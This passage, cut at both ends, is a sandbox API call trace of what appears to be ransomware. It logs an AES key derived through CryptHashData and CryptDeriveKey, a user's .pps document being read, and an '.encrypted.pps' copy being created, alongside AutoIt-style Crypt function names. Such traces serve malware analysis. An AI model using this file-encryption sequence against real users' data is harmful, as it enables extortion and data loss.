Size=0x8) returned 0x7da2e8 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9c8 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac320 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0034.423] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.423] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0034.423] CryptHashData (hHash=0x7c2100, pbData=0x7c97d8, dwDataLen=0x100, dwFlags=0x1) returned 1 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae968 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0034.423] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0034.423] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.424] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.424] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.424] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0034.424] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.424] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0034.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.424] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0034.424] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0034.424] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.425] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0034.425] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0034.425] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae968 [0034.425] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.425] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0034.425] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0034.425] CryptDestroyHash (hHash=0x7c2100) returned 1 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0034.425] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.425] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.425] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0034.426] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.426] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.426] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\cjzms2vlntpb5-vcp3um.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.426] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.426] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.426] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0034.426] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.426] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0034.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0034.427] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.encrypted.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\cjzms2vlntpb5-vcp3um.encrypted.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0034.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0034.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0034.427] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0034.427] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.427] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0034.427] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0034.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.427] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0034.428] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x8e5a, lpOverlapped=0x0) returned 1 [0034.429] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0034.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0034.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8e5a) returned 0x955018 [0034.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0034.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0034.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0034.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8e5a) returned 0x95de80 [0034.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0034.431] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.431] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0034.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0034.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.431] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8e5a) returned 0x955018 [0034.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0034.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0034.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0034.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.432] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0034.432] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0034.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.432] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0034.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.432] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0034.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0034.433] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.433] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.433] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0034.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0034.433] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.433] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0034.433] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.433] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.433] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.433] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0034.434] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0034.434] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.434] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0034.434] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.434] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.434] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.434] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: 